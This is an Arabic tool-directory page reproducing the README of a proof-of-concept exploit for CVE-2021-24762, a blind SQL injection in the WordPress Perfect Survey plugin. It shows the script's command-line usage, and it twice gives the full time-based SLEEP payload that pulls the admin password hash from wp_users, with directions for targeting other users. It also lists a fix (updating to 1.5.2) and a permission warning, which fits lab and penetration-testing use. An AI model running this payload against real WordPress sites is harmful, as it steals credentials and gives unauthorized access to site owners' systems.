Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Exploit_CVE-2021-24762 — يعرض هذا المستودع استغلالًا لـ CVE-2021-24762. وهو استغلال حقن SQL أعمى (Blind SQLi) يقوم، في الإعداد الافتراضي، باستخراج كلمة مرور المسؤول. | Kitploit
أدوات/GitHubGitHub/c4cnm/exploit_cve-2021-24762
كسر كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubc4cnm/exploit_cve-2021-24762

Exploit_CVE-2021-24762

يعرض هذا المستودع استغلالًا لـ CVE-2021-24762. وهو استغلال حقن SQL أعمى (Blind SQLi) يقوم، في الإعداد الافتراضي، باستخراج كلمة مرور المسؤول.

عرض المستودع
1منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

exploit_cve-2021-24762

يعرض هذا المستودع استغلالًا لثغرة CVE-2021-24762. وهو استغلال حقن SQL أعمى (Blind SQLi) يقوم، في الإعداد الافتراضي، باستخراج كلمة مرور المسؤول.

أثناء قيامي بمختبر يعتمد على ووردبريس مع إضافة PerfectSurvey، علقت في ثغرة SQL. كان الـ PoC الوحيد المتاح الذي وجدته مبنيًا على sqlmap ولم يكن يعمل بشكل صحيح في المختبر الذي كنت أعمل عليه (كانت هناك الكثير من المشكلات الإضافية، مثل إرجاع التطبيق لـ 404، وتباين مهلات الانتظار بشكل كبير، ومشاكل أخرى. لذلك أنشأت هذا لاستغلال المختبر.

الأهداف

  • يستغل هذا الـ PoC ثغرة CVE-2021-24762، المرتبطة بإضافة Perfect Survey في ووردبريس.
  • يعتمد الاستغلال على حقن SQL مع SLEEP، ويحصل على تجزئة كلمة المرور (password hash) للمستخدم admin. هذا المستخدم هو الافتراضي في بيئات ووردبريس.
  • أين يعمل: إضافة Perfect Survey في الإصدارات الأقدم من 1.5.2.

التأثير والخطورة

  • CVE-2021-24762: [CVSS 9.8 (حرجة)]
  • التأثيرات: السرية، السلامة، التوفر، الوصول غير المصرح به.

البيئة

  • متطلبات البرمجيات: Python3.

طريقة الاستخدام

root@kitploit:~
 ____     _      ___   ____
 / ___|   / \    |_ _| / ___|
| |      / _ \    | |  \___ \
| |___  / ___ \   | |   __ ) |
 \____|/_/   \_\ |___| |____/

   CAIS - Inteligência em Cibersegurança
   Exploit for: CVE-2021-24762

usage: exploit_cve-2021-24762.py [-h] [-u URL] [-p PATH] [-d DELAY] [-t TIMEOUT] [-c CHARSET] [-m MAX_LEN] [-v]

Safe CLI wrapper — receives url/path/delay/timeout/charset and forwards it

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL (default: http://192.168.10.10)
  -p, --path PATH       path (default: /wp-admin/admin-ajax.php)
  -d, --delay DELAY     delay in seconds (default: 30)
  -t, --timeout TIMEOUT
                        timeout in seconds (default: delay + 15)
  -c, --charset CHARSET
                        charset to be used (default: alnum + ./$_-@)
  -m, --max-len MAX_LEN
                        maximum length (default: 20)
  -v, --verbose         activates log debugging
  1. تستقبل السكربت بايثون المعاملات أعلاه. وفي حال لم يتم تمريرها، ينفذ السكربت بقيمه الافتراضية.

  2. من الأفضل أن تمرر عنوان URL على الأقل. افعل ذلك باستخدام -u أو --url. المعاملات الأخرى ستعمل غالبًا بالقيم الافتراضية.

  3. في الإعداد الافتراضي، سيحصل على تجزئة كلمة المرور للمستخدم admin. يُطبَّق هذا الإعداد في متغير payload، في قيمة user_login: payload = f"1 AND (SELECT COUNT(*) FROM (SELECT 1 WHERE ORD(SUBSTRING((SELECT user_pass FROM wp_users WHERE user_login=0x61646d696e),{position},1))={ascii_code} AND SLEEP({delay})) AS a)"

    في حال احتجت إلى العثور على التجزئة لمستخدم آخر، غيّر 0x61646d696e (admin) وفق احتياجاتك.

المخاطر والقيود

  • القيود: في الإعداد الحالي، يحصل هذا الـ PoC فقط على تجزئة كلمات المرور في ووردبريس مع بنى قواعد البيانات الافتراضية. إذا واجهت بيئة معدّلة، فستحتاج إلى تغيير هذا الـ payload: payload = f"1 AND (SELECT COUNT(*) FROM (SELECT 1 WHERE ORD(SUBSTRING((SELECT user_pass FROM wp_users WHERE user_login=0x61646d696e),{position},1))={ascii_code} AND SLEEP({delay})) AS a)"

التخفيف والمعالجة (التوصيات)

  • توصيات التخفيف: حدّث الإضافة إلى الإصدار 1.5.2 أو أحدث.
  • المراجع:
    • https://nvd.nist.gov/vuln/detail/CVE-2021-24762
    • https://www.getperfectsurvey.com/

تحذير والتفويضات

استخدام مقيد — يحتوي هذا المستودع على محتوى حساس مخصص للاستخدام الأخلاقي والمسؤول فقط. تذكر أنه يجب أن يكون لديك إذن كتابي من مالك النظام الذي تختبره. أي استخدام خارج هذا النطاق غير مسموح به وستقع المسؤولية عليك (هل تريد الذهاب إلى السجن؟).

بنية المستودع

  • exploit_cve-2021-24762 — الاستغلال.
  • README.ME — هذا الملف.

سجل التغييرات

2025-10-10 — c4cnm — Creation and initial modifications

التواصل

  • المؤلف: Red Team CAIS:/Matheus Camargo (c4cnm), [email protected].

الترخيص

GNU General Public License v3 (GPL)

تنزيل الأداة